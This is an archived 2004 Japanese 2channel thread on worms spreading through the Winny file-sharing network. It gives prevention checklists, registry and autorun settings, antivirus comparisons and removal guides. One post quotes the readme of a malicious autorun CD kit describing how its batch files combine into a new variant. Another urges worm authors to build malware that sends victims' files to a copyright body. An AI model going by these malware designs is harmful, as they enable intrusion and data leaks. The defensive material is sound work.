5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part16

1 :[名無し]さん(bin+cue).rar:04/04/07 12:05 ID:nf/rKDVK
Antinny、その他Winnyで流れてるウイルスの概要、及び対処方etc。
質問は、>>2以下のテンプレを読んでからにしてください。

Antinny以外の流行パターン
・exeの前にスペースたくさん
・.folderの拡張子
・autorun+bat
・キンタマ

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part14
http://tmp2.2ch.net/test/read.cgi/download/1079918577/l50

Antinny対策サイト
http://nyweb.hp.infoseek.co.jp/
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A

2 :[名無し]さん(bin+cue).rar:04/04/07 12:05 ID:6P4MKKMn
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kerio Personal Firewall 4

・「システムセキュリティ」というプログラム起動を監視する機能により、
 キンタマウイルス http://www.symantec.com/region/jp/sarcj/data/w/w32.antinny.k.html
 などのアイコンを偽装したEXEファイルをクリックしても警告が出て感染を防げる
 (玄人向けで有料だがTiny5でも防げる。
  Sygate・Zone Alarmには似たような機能があるが防げない。
  Outpost・Kerio2・ノートン・バスター・マカフィー・ウイルスセキュリティに至っては類似機能もない)

・現時点では日本語化できない
・2バイト文字には対応していない
・Kerio2よりはわかりやすく、Zone AlarmのようにYES/NOだけでもいけるし
 kerio2のように詳細ルールも作れる
・SPIとIDS、トロイ対策のDLL監視機能もある(広告ブロックは有償版のみ)
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

●「Firewallと森で遊ぼう」Kerio Personal Firewall 4解説サイト
http://eazyfox.homelinux.org/Firewall/Kerio/Kerio41.htm

●Kerio Personal Firewall 4のログビューア
http://www.geocities.jp/masagooooool/

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

3 :[名無し]さん(bin+cue).rar:04/04/07 12:05 ID:6P4MKKMn
901 名前:900[sage] 投稿日:04/04/02 22:14
アンチウイルスソフト検出力結果報告(・∀・)

ANTIDOTE / avast! 4 / AVG / AntiVir / BitDefender / eTrust
◇ウイルス
EBCVGにてBinary VirusesとVirus codesを合計722ファイル(重複あり)
全てzip圧縮に変換
Linux/Macウイルスあり
◇アンチウイルスソフト
4/2 18:00頃の最新パターン適用
比較対照としてトレンドマイクロオンラインスキャンを使用・・・したかったけど結果悪いのでBitDefenderを基準に

☆結果 (検出数/検出率)
BitDefender (*1) 580  100.0%
AVP (*2) 545  93.97%
Trend Micro 539  92.93%
Antidote (*3) 524 90.34%
avast!4 (*4) 470  81.03%
eTrust (*5) 444  76.55%
AVG (*6) 212  36.55%

*1 懐疑ファイル13含む
*2 懐疑ファイル2含む
*3 コード解析/圧縮ファイル/詳細検索にチェック。詳細検索にチェックを入れない場合は520。なお懐疑ファイルはどちらも3。
*4 迅速な検査=261  標準検査=286  完全な検査=470
*5 Heuristic有効。SafetyLevel → Reviewer   ScanningEngine → InoculateIT
*6 Heuristic有効。

AVGの検出率が悪すぎる。何かおかしい気が・・・(・∀・)?
【cool】BitDefender Free Edition【free】
http://pc3.2ch.net/test/read.cgi/sec/1029516867/901

4 ::04/04/07 12:05 ID:1FhoqM/e
【警報】Winnyを狙ったワーム・ウイルス情報 Part15
http://tmp2.2ch.net/test/read.cgi/download/1080816795/

ごめんなさい。ごめんなさい。ごめんなさい
間違えちまった

5 :[名無し]さん(bin+cue).rar:04/04/07 12:06 ID:04J6JO7+
ぷpじゅじゅ

6 :[名無し]さん(bin+cue).rar:04/04/07 12:06 ID:6P4MKKMn
802 名前:Bitスレ901[sage] 投稿日:04/04/04 19:02
BitDefender(以下BD)が全てのウイルスを検出したわけではないです。
BDが検出したウイルス数の580を100%として出した結果です。
要するにAVGだとBDの37%ということです。

誤解してる人がいるかもしれないので念のため。

※AVGの検出は悪すぎたので"3回再インスト&4回検査”してます。
 で、結果は全て同じ(゚д゚)

非圧縮時の検出率を知りたい人は適当にウイルス集めて試してください(´・ω・`)

【フリー】AVG Anti-Virus Version15
http://pc3.2ch.net/test/read.cgi/sec/1079833302/802

7 :[名無し]さん(bin+cue).rar:04/04/07 12:06 ID:6P4MKKMn
831 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/04/05 01:03
去年(031207)同じようにやった結果

定義ファイル、プログラムは当時最新
圧縮なんかの設定はebcvgから落としてきたまま(rar,zip,b64)
ただしほとんどはzipだから誤差は少ないと思う

Antidote (*1) 549 100.00%
eTrust (*2) 537 97.81%
BitDefender (*3) 502 91.44%
avast!4 (*4) 484 88.16%
AVG (*5) 366 66.67%

*1 コード解析,圧縮ファイル,電子メール, 懐疑5
*2 設定が多いから略。たぶん最高
*3 圧縮プログラム 圧縮ファイル, メール, ヒューリスティック
ただしvirus bodiesは584, 懐疑22
*4 圧縮ファイル
*5 圧縮プログラム 圧縮ファイル, メール, ヒューリスティック
(一応どれも設定は最高にしてやったつもり)

>>731と見比べると向こうはBitdefenderの検出数をvirus bodiesで
数えてるんじゃないかと思う。
おれはIdentified virusesが検出数だと思うから上はそっちを採用してる。

AVGの検出が悪いのはたぶん設定の問題。でも良くはない
むしろ>>742と同じような結果だから、AVGの検出力はこんなもんだと思ってる。

【フリー】AVG Anti-Virus Version15
http://pc3.2ch.net/test/read.cgi/sec/1079833302/831

8 :[名無し]さん(bin+cue).rar:04/04/07 12:06 ID:04J6JO7+
いyggほい:jぽj

9 ::04/04/07 12:07 ID:1FhoqM/e
前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part15
http://tmp2.2ch.net/test/read.cgi/download/1080816795/

10 :[名無し]さん(bin+cue).rar:04/04/07 12:24 ID:ra8AFJoe
 キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

【速報】全国一斉Winny利用者逮捕【約100人】 
 
 http://f19.aaacafe.ne.jp/~newsnews/newsJapan.htm


11 :[名無し]さん(bin+cue).rar:04/04/07 12:26 ID:oNeHvLOO
感染しないためにやっておくべきこと
・ファイルの拡張子は表示させる。開くときは拡張子を確認 [必須]
・シングルクリックをダブルクリックにする
・アンチウイルスソフトのインストール、常駐、定期的に更新 [常駐必須]
・落としたファイルは必ずウイルススキャン
・exe, *.lzhなどの二重拡張子を無視リストに(ただし、マシンに負荷が掛かる)
・lzh,zip,rarなど圧縮ファイルは解凍後要注意
・exeファイルは完全自己責任
・こまめにバックアップ
・nyをProgramFilesに置かない、CacheとDownフォルダは詳細表示にする
・whiter対策としてC:\Windows\SystemにWhismng.exeフォルダ作成
 (フォルダ名と同じファイルは置けないので防止できる)
・WhiterVBS簡易チェッカーでチェックしてみる
 http://mxtrojan.at.infoseek.co.jp/column02.html
・怪しい・危険なファイルはWinnyFileDatabaseでチェック
 http://nydb.info/
・CCDはautorunを切ってdaemonでマウントして
 中の実行ファイル(setup.exe)をアンチウイルスソフトでチェックする。
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)


12 :[名無し]さん(bin+cue).rar:04/04/07 12:27 ID:oNeHvLOO
・IEのセキュリティ設定を厳しくする、特にActiveXコントロールとプラグインを無効orダイアログ表示にする。
・拡張子「.folder」で悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり。
 http://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
 Flagsの値を10進数で1に変更する。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
 ただしインストーラで弊害が起こることもある
・CD/DVDの自動実行はオフ。
各OSでのやり方は↓。また窓の手などでソフトで簡単にオフに出来る。[必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※DaemonToolの自動起動をオフにしても意味は無い

・新種を発見した場合はここにサンプルを提出
 http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949


13 :[名無し]さん(bin+cue).rar:04/04/07 12:28 ID:oNeHvLOO
無視リスト (以下をIgnore.txtにコピペ)

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0

※ただし、追加しすぎるとマシンに負荷が掛かるので注意



14 :[名無し]さん(bin+cue).rar:04/04/07 12:29 ID:oNeHvLOO
■キンタマ■
感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏む。(ex.特典写真.jpg         .exe)
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
感染確認方法
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成ある。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\xxx\xxx.exe登録。
・スタートアップに該当プログラムを登録。(msconfigで確認)
駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
症状
・感染したらnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取られる。
・デスクトップにあるファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh
 という形に圧縮してnyのupフォルダに置かれる。その時UpFolder.txtも書き換えられる。
・nyを接続すると知らない間にny経由でこれらを落とされる。
・各exeファイルはそのアイコンの本来の動作も同時に行うので気づきにくい。
 例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示する。
予防対策
・推奨無視ワード「キンタマ」「デスクトップ」。
・今回に関わらず、nyで落とした.exeファイルの実行を控える。

まとめサイト
http://www.geocities.jp/kim_virus/
http://myui.s53.xrea.com/kin/index.html
http://chiakis-web.hp.infoseek.co.jp/kintama-v/


15 :[名無し]さん(bin+cue).rar:04/04/07 12:31 ID:oNeHvLOO
549 名前:[名無し]さん(bin+cue).rar 投稿日:04/02/23 20:35 ID:kNK6RjB5

PC再インスコして、autorun切るのすれてて、「Autorunを切ってないような初心者は少し痛い目を見てください。 Version 2」
っつーのに引っかかってしまいますた。。。
すぐにタスクマネージャーからそれらしいの切ったんですけど、このまま再起動しても大丈夫でしょうか。。。
こんなtxtファイルも同封されてました。
=======================================================================
◆ファイル構成

  6つ揃えてCDに一緒に焼き込めば、即席で亜種が作成できます。
  ただのbatなのでノートン先生も何のその。(そーでもない)
  悪用した結果は自己責任ですよ。(ひっかかる人いないだろうけど)

Autorun.inf Setupが起動するように指定。
Setup.bat bug起動、分身作成、Setupcfg起動。
bug.exe 67氏作成対半島用ソフト。詳しくは自分で調べましょう。
    bug.exe.lnk   再起動時にも音が鳴るように工夫。馬鹿は辛い……。
winny.sys bugの効果音。MIDI、WAVをリネームして使う。
Setupcfg.bat ファイルを消す。それだけ。
Readme.txt このファイル。
    その他 ただのカモフラージュ。別名容量稼ぎ。byねつ造君。
=======================================================================



16 :[名無し]さん(bin+cue).rar:04/04/07 12:33 ID:oNeHvLOO
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/


17 :[名無し]さん(bin+cue).rar:04/04/07 13:02 ID:bMAQT4m6

ノートンの最新定義ファイルでスキャンすると感染してないんだけど
オンラインでやると7つファイルがアンチニーに感染してるんだよね・・・・・
(隠しファイル表示させても出て来ない=駆除出来ない)
もうwinnyはやってないから放置してるんだけど駆除方法あるの?

18 :[名無し]さん(bin+cue).rar:04/04/07 13:02 ID:5cnjySzu
>>13
> 無視リスト (以下をIgnore.txtにコピペ)
> .exe,,0,0,,0,1,0
.
.
.
> .exe .lzh,,0,0,,0,1,0



重複設定でつ

19 :[名無し]さん(bin+cue).rar:04/04/07 13:04 ID:1v+hHOx5
テンプレすげえためになるな。

20 :[名無し]さん(bin+cue).rar:04/04/07 13:14 ID:ZmzxxIfi
知らない間に、winnyのフォルダにUPフォルダが追加されて、キャッシュが満杯ですと
表示されました。これは、ウイルスに感染したのでしょうか?

21 :[名無し]さん(bin+cue).rar:04/04/07 13:24 ID:2RsddXb8
>>10

騙された(;つД`)

22 :[名無し]さん(bin+cue).rar:04/04/07 13:27 ID:3GKbZnOV
>>10
これ何?ウイルスですか?

23 :[名無し]さん(bin+cue).rar:04/04/07 13:29 ID:Sp0byJcL
>>21
aaacafeで気づけと小一時間(ry

24 :[名無し]さん(bin+cue).rar:04/04/07 13:29 ID:ra8AFJoe
2ちゃんねらーを狙った新種のウィルス
ttp://pc3.2ch.net/test/read.cgi/pcnews/1075905244/


25 :[名無し]さん(bin+cue).rar:04/04/07 14:53 ID:OxowPPXe
トラップやウィルス予防にと、VirtualPCをnyで落としてみた(w

とりあえず落としたファイルをノートン先生でスキャンしてみたが、特に問題は無し。
それではとインストーラーをクリックした直後・・・・・・・・・・・・・・・HDDが地獄のノンストップ状態。

キタ━━━━━━(゚∀゚)━━━━━━ !!!!!







つくづく情けない自分の厨ぶりに、自然と笑みがこぼれた。
・・・・・何とかしてよノートン先生(つД`)

26 :[名無し]さん(bin+cue).rar:04/04/07 15:09 ID:pjXsXIH/
なんかAntinnyに感染してノートンが反応したんだけど
何回OK押しても次から次へと削除しましたのメッセージが
おかしいと思って検疫ログ見たら6500個もexeファイルが検疫されてたよ・・


27 :[名無し]さん(bin+cue).rar:04/04/07 15:11 ID:2LUl09Zk
http://pc3.2ch.net/test/read.cgi/sec/1080908533/275-
バスター対応遅いっていってるけど、
案外ユーザーの傾向によるのでは

28 :[名無し]さん(bin+cue).rar:04/04/07 15:44 ID:E4tgm0Mm
>>25
まぁそればかりは仕方ないな。事前の情報収集くらいしか対処法ないし。

それはそうと、どうしてみんなVPCばっか使う(落とす)わけ?
VMの俺は少数派なんだろうか……。

29 :[名無し]さん(bin+cue).rar:04/04/07 15:52 ID:NNNBTomW
バスターなんかよりこっちのがいいよ
ttp://cgi.f22.aaacafe.ne.jp/~ochn/och/img/1427.jpg

30 :[名無し]さん(bin+cue).rar:04/04/07 15:54 ID:T1B9Anxe
さっきNoderef.txtがカラになってたんですけどそういうウィルスありますか?

31 :[名無し]さん(bin+cue).rar:04/04/07 16:09 ID:OL5MXbFM
>30
(´・ω・)人(・ω・`)ナカマー
じょじょにノードリスト減ってったよ


32 :[名無し]さん(bin+cue).rar:04/04/07 16:18 ID:3GKbZnOV
Upフォルダーが勝手にできるのはキンタマですけど
Upリストのみが勝手に作られるのっていうのは何なんですか?

33 :30:04/04/07 16:24 ID:T1B9Anxe
>>31
でもそれ以外の被害はないんですよね...

34 :[名無し]さん(bin+cue).rar:04/04/07 16:48 ID:xCX4JN8R
知らない間にこんなに恐ろしいことになってるとは・・・・

35 :[名無し]さん(bin+cue).rar:04/04/07 17:03 ID:1v+hHOx5
キンタマ確実に機能アップしてるぞ・・・。すげえスピードだ・・。
今バージョン2.05ってとこかな。

36 :[名無し]さん(bin+cue).rar:04/04/07 17:09 ID:/0oO8tG/
微妙な感じで被害が出てないってのが一番怖い気がする((((;゚Д゚))
前スレか玉玉スレかに出てた、
3月頭に踏んで一度バスターで駆除して症状も出なかったはずなのに
通報日トリガー来たら亜種起動で凄いことになったって人いたじゃん。
その人が感染して発動するまで一ヶ月、同じようにGやK以外に
未知の亜種がもっと広まっていて、近い内あちこちで活動し始めたりして…。


37 :[名無し]さん(bin+cue).rar:04/04/07 17:18 ID:OzzKE59E
自分のデスクトップの画像ファイルが
流れてるか確認する方法あるか?

38 :[名無し]さん(bin+cue).rar:04/04/07 17:40 ID:3WfscpE0
>37
winnyに接続して自分のログイン名で検索してダウン
自分はとりあえずなかったホッ!ホッ!(o`Θ´)o

39 :[名無し]さん(bin+cue).rar:04/04/07 17:42 ID:etbf2Gfu
>>37

[キンタマ] 自分のPC名 .jpg
【晒し挙げ】 自分のPC名 .jpg

をダウンリストに登録してじっと待つ。


40 :[名無し]さん(bin+cue).rar:04/04/07 17:53 ID:3WfscpE0
んでありましたか?

41 :[名無し]さん(bin+cue).rar:04/04/07 17:57 ID:+ZxCFXxf
ttp://nyweb.hp.infoseek.co.jp/
を順番どおりやってたんですがNy.exeがみつかりません、どうすればいいでしょうか。

42 :[名無し]さん(bin+cue).rar:04/04/07 18:04 ID:cB+zA3yY
キンタマ感染でデスクトップ上のマイドキュメント内
のファイルは大丈夫?うpされてる可能性ある?


43 :[名無し]さん(bin+cue).rar:04/04/07 18:11 ID:3WfscpE0
>42
いまのところうpされてるのみたことない
自分のもマイドキュメントまではなかった
まぁ自分も感染したんだけどさw

44 :[名無し]さん(bin+cue).rar:04/04/07 18:21 ID:0V07ga78
Winamp使い多いだろうから一応

「Winamp」に危険度“高”の脆弱性
http://www.itmedia.co.jp/news/articles/0404/06/news016.html

45 :[名無し]さん(bin+cue).rar:04/04/07 18:28 ID:N4cmSdUq
Winampってまだあるの?

46 :[名無し]さん(bin+cue).rar:04/04/07 18:41 ID:4msD1kRd
ドラクエの呪われた時の曲が流れるウィルス喰らった…
これ、なんてウィルス…?

47 :[名無し]さん(bin+cue).rar:04/04/07 18:43 ID:LMv7nt4y
>>46
エロゲ?

48 :[名無し]さん(bin+cue).rar:04/04/07 18:47 ID:4msD1kRd
YES!

49 :[名無し]さん(bin+cue).rar:04/04/07 19:23 ID:/LOD54sp
>>46
前スレで2名くらい同じ症状になってたよ。

50 :[名無し]さん(bin+cue).rar:04/04/07 19:47 ID:IYyzsO4c
[キンタマ] 俺のデスクトップ 本郷春香 [04-03-14].zip
748faa0d77a7a5c046bc5c6b9828daba

はGなのでみんなきをつけてね。(解凍した時点で先生反応)
泳がせてみたいんだが、exeが見つからない。どこにあるんだろ?

51 :[名無し]さん(bin+cue).rar:04/04/07 20:02 ID:E4tgm0Mm
見つからないも何も、先生が反応した次点で消去されたんじゃ?

先生がどこに移動したか知りたいって事か?

52 :[名無し]さん(bin+cue).rar :04/04/07 20:06 ID:XRLm6QXZ
噂のNetsky
共有ソフトサイトに一斉攻撃。
NHKのニュースだと4月8日午前0時から開始とか。
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.s@mm.html

53 :[名無し]さん(bin+cue).rar:04/04/07 20:07 ID:6EEJzprR
キンタマとかexeとか漁っていると、微妙にmarunouchi.*.*.jpに粘着されるんだが。
ガード上げないとだめかなぁ。

54 :[名無し]さん(bin+cue).rar:04/04/07 20:08 ID:IYyzsO4c
>>51
厨なこと書いてすまんかった。そりゃそうだよね・・・。
今オートプロテクト切ってもう一回解凍したら
.folder exeがあった。
とりあえず今のシムテムバックアップとって遊んでみます。

55 :[名無し]さん(bin+cue).rar:04/04/07 20:13 ID:OzzKE59E
キンタマ] 俺のデスクトップ AAAAAAAA (××会社) [04-04-06](ファイル詰め合わせ).zip

とか、ファイル名に会社名とか入れている奴は
ユーザー名に会社名まで入力しているのか。

56 :[名無し]さん(bin+cue).rar:04/04/07 20:17 ID:5l26v2e5
Officeなんかのインスコで入れさせられる会社名を
引っ張ってきているのでは

57 :[名無し]さん(bin+cue).rar:04/04/07 20:21 ID:OzzKE59E
怖いな。
会社名と実名入れられて流されたんじゃ、
ばれそうだな。

58 :[名無し]さん(bin+cue).rar:04/04/07 20:28 ID:9/XivD10
最近ノートン先生のうぷデイトの間隔が早い気がする

59 :[名無し]さん(bin+cue).rar:04/04/07 20:34 ID:yYpf8fyQ
俺もノードリストが空っぽだよ(´・ω・`)

60 :[名無し]さん(bin+cue).rar:04/04/07 21:31 ID:dyI9fYdk
nyやっててユーザ名や会社名に実名入れてる香具師なんか
いるのか?

61 :[名無し]さん(bin+cue).rar:04/04/07 21:35 ID:bmNSvjuR
キンタマで検索してみれば?

62 :[名無し]さん(bin+cue).rar:04/04/07 21:51 ID:vMv3QFmA
おまいらの話聞いてると
まだウイルスにかかってない自分が不思議でならない

63 :[名無し]さん(bin+cue).rar:04/04/07 21:52 ID:zUW4ebR+
キンタマワーム踏んだ覚えはないんやけどUpfolder.txtはあった.
でもこれは相当前からあった気がするわ.win.inに[ぬるぽ]もあったな.これは以前に感染したキャッシュを空にするヤツのせいか?
レジストリエディタ(regedit.exe)も正常に開くし,"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"も特に書き換えられてない.
"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"もない.
UpフォルダDownフォルダ共に怪しいファイルもないし,大丈夫かな?
一応OSクリーンインストールしたのだが….



64 :[名無し]さん(bin+cue).rar:04/04/07 22:40 ID:EQxph73I
>>63
クリーンインストールしたのにWin.iniに[ぬるぽ]があるってのはありえない。
上書きインストールとか修復インストールとかじゃないのか?こういう不完全な再インストールは
[ぬるぽ]が残ってしまっていることからもわかるように、ウィルス除去としてはあまり意味が無い。
もしくはクリーンインストールの後でまた感染したか。

65 :[名無し]さん(bin+cue).rar:04/04/07 22:51 ID:etbf2Gfu
>>55
ユーザー名とは別に所属の項目があるから、ユーザー名:磯野波平、
所属:海山商事 みたいのをキンタマ側で(カッコ)してまとめてるんだと思う。
所属が空欄の場合はつけない、という形で対応。

66 :[名無し]さん(bin+cue).rar:04/04/07 22:51 ID:Sp0byJcL
>>25
遅レスだが、なぜnydbで調べないのかと小一時間(ry
それと、踏んだ香具師はとりあえず、nydbに危険信号をあげてくれ('A`)


つ 171e23b2c282544b65bdddecfaa704c5

とりあえず漏れが使ってるOKなやつ。

67 :[名無し]さん(bin+cue).rar:04/04/07 22:54 ID:zUW4ebR+
>>64
クリーンインストールしたのは,最終的にです.その前に感染してたのかどうかは知りたかったのです.
情報漏れていたら怖いので.

68 :[名無し]さん(bin+cue).rar:04/04/07 22:55 ID:z/iAF3Da
VMWareならPandoraに…

69 :[名無し]さん(bin+cue).rar:04/04/07 23:03 ID:6FH/ulzN
>>62
騒ぐのはかかったやつだけだからな

70 :[名無し]さん(bin+cue).rar:04/04/07 23:11 ID:GfBaR63f
外付けのHDDにある怪しいファイルからでも感染するんですよね?

71 :[名無し]さん(bin+cue).rar:04/04/07 23:28 ID:GfBaR63f
70ですけど、言葉がたりないな。
感染してるか不安だったのですでに再セットアップしました。
でも、もともと外付けHDDに危ないファイルがあった場合、
その外付けのHDDもフォーマットした方がいいんでしょうか。
つまりCさえつぶせばいいのでしょうか。

72 :[名無し]さん(bin+cue).rar:04/04/07 23:32 ID:KllG34me
>>52
パソコンのことはほとんど知らないのに
「明日はコンピューターウィルスに注意!」と
家族が教えてくれた。何事かと思ったら、これのことだったのか。
「音楽とか映像とか何とか言ってたけど、そんなのしてないから関係ないよね?」と言ってた。

73 :[名無し]さん(bin+cue).rar:04/04/07 23:58 ID:HBKn/NaY
>>71
どうせまた感染するんだからどっちでもいいと思うよ

74 :[名無し]さん(bin+cue).rar:04/04/08 00:04 ID:1tOFtgMb
これはええのかい?

名前 Antinny.ms(仮)
    Bの亜種? ノートン、バスター共に未対応
サイズ 1.26MB
開発名 SilentToker Delphi製

症状
・Windowsフォルダにsvchost.exeを作成。
 無い場合もあり。Systemフォルダのsvchost.exeは問題なし。
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効に。
・毎月第一月曜日に発動。なにやってんのかは不明。
・親と子があり、いずれもSystemフォルダに作成される。
・子はms???.exe(248k)。親はms???.exe(282k)
 子は消しても再起動すると親が作成する。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可
・親はサービスに登録される。
・親子ともにファイルバージョン5.1.3125.1093、製品バージョン6.00.1800.1007。

対策
1. 親のファイル名が含まれるレジストリキーを削除。
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
2. セーフモードで親子ともどもファイル削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。

75 :[名無し]さん(bin+cue).rar:04/04/08 00:05 ID:1tOFtgMb
↑これは(貼っておかないで)ええのかい?
という意味ですた。・・・一応

76 :[名無し]さん(bin+cue).rar:04/04/08 00:08 ID:0rjbxb4h
>>52
これって、今ジャン

77 :[名無し]さん(bin+cue).rar:04/04/08 00:15 ID:N4+HoAUj
ミスチルの「シフクノオト」のアプリってやばいの・・?
俺実行してしまった。


78 :[名無し]さん(bin+cue).rar:04/04/08 00:18 ID:5qdkk6AE
CPU使用率100%になるウィルス食らったんで再インスコしたんだが、
相変わらず何かを動かしてると無茶苦茶不安定になる(使用率が20%〜100%の間をうろうろと)

これはHDDがやられたと思っていいんかな?

79 :[名無し]さん(bin+cue).rar:04/04/08 00:23 ID:TiVUWvfX
>>77
アプリ?
ファイル名は?

80 :[名無し]さん(bin+cue).rar:04/04/08 00:23 ID:0rjbxb4h
早速ネットワークが重くなってる気がする

81 :[名無し]さん(bin+cue).rar:04/04/08 00:26 ID:DejWDCQY
定期皿仕上げされるのは、何てウィルスですか?
なんかかかったんですよ

82 :81:04/04/08 00:32 ID:DejWDCQY
デスクトップが晒されるやつです。


83 :[名無し]さん(bin+cue).rar:04/04/08 00:34 ID:+Ex08cDw
>>78
上書きインスコじゃなく、きちんとHDD全部フォーマットしてから
クリーンインスコ汁!ちゃんとおれに礼を言えよ。

84 :77:04/04/08 00:35 ID:N4+HoAUj
>79
ファイル名はよくわからない・・。
とりあえず普通にアルバムの曲は本物で、何か怪しいなと思いながらアプリを起動したら
勝手にアップフォルダに自分のdownフォルダに入ってる動画やらmp3が次々とアップされてたんよね。
これってただ単にアップさせられただけなのかな?全部消したけど・・。

85 :[名無し]さん(bin+cue).rar:04/04/08 00:36 ID:5i3w5b2Q
>>78
思うのは自由だ。

86 :[名無し]さん(bin+cue).rar:04/04/08 00:37 ID:+Ex08cDw
>>84
よくあるキンタマ。

87 :[名無し]さん(bin+cue).rar:04/04/08 00:38 ID:5qdkk6AE
>>83
解りました、やってみます。
ありがとうございました、このご恩は忘れません

>>85
思い違いって事ですね。

88 :[名無し]さん(bin+cue).rar:04/04/08 00:38 ID:5i3w5b2Q
>>84
たんにあっぷさせられただけ?

89 :81 82:04/04/08 00:39 ID:DejWDCQY
教えていただけないのですか?

90 :[名無し]さん(bin+cue).rar:04/04/08 00:41 ID:+Ex08cDw
>>89
>>86

91 :[名無し]さん(bin+cue).rar:04/04/08 00:42 ID:DejWDCQY
ありがとうございました

92 :[名無し]さん(bin+cue).rar:04/04/08 00:58 ID:wrywcRPO
キンタマ作者や亜流作者も、>>84これみたいにupフォルダやディスク内のサイズの大きなファイルをから、ACCSや著作権団体に送りつけるウィルス作ればいいのに
upしたり、up出来る状態にしていた時点で、ウィルスのせいで発覚したとはいえ感染者の犯罪は確定でしょ?
何でまどろっこしい事しかしないんだろう?(´・ω・`)・・・
所詮、この人達には難しいウィルスは作れないのかな

93 :[名無し]さん(bin+cue).rar:04/04/08 01:03 ID:pGq9vyzx
>>92
キンタマKはACCSに個人情報を10秒毎に送信する仕様だったらしい。
この事からウィルス作者の志向と何をしたかったのか推察してやれ。

94 : :04/04/08 01:08 ID:aAHnSUo8
PC内のtxtファイルが全部「ぬるぽ」というコメントつきの内容に変わっちまった・・
正直気持ち悪い。何これ???

95 :[名無し]さん(bin+cue).rar:04/04/08 01:10 ID:5i3w5b2Q
>>92
nyでUPさせるんじゃなくて、ウィルスが勝手にメールなりなんなりで送信
するのは「不特定多数が受信可能な状態」にならない。

データが送られてきても、それは「そのデータが不特定(略)」だったこと
を証明してくれない。

勝手にデータを発信するタイプの常駐ソフトはノートン等だいたいのセキ
ュリティソフトにひっかかる。


96 :92:04/04/08 01:13 ID:wrywcRPO
>>93
つまり・・・
